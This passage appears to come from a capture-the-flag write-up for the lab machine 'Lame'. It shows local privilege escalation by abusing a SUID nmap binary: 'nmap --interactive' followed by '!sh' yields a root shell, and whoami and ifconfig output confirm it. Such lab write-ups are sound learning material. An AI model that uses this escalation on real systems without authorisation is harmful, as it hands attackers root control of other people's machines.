Nmap
Nmap is configured to be a SUID binary in the target system
According to GTFObins, Nmap can be abused for privilege escalation if configured to have the SUID bit set
I will get straight to it
daemon@lame:/var$ nmap --interactive
starting nmap v. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
sh-3.2# whoami
root
sh-3.2# hostname
lame
sh-3.2# ifconfig
eth0 link encap:Ethernet HWaddr 00:50:56:b9:b0:52
inet addr:10.10.10.3 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:b052/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:b052/64 Scope:Link
up broadcast running multicast mtu:1500 Metric:1
rx packets:364197 errors:0 dropped:0 overruns:0 frame:0
tx packets:7011 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:33735035 (32.1 MB) TX bytes:966387 (943.7 KB)
interrupt:19 Base address:0x2024
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
up loopback running mtu:16436 Metric:1
rx packets:1565 errors:0 dropped:0 overruns:0 frame:0
tx packets:1565 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
rx bytes:756377 (738.6 KB) TX bytes:756377 (738.6 KB)System Level Compromise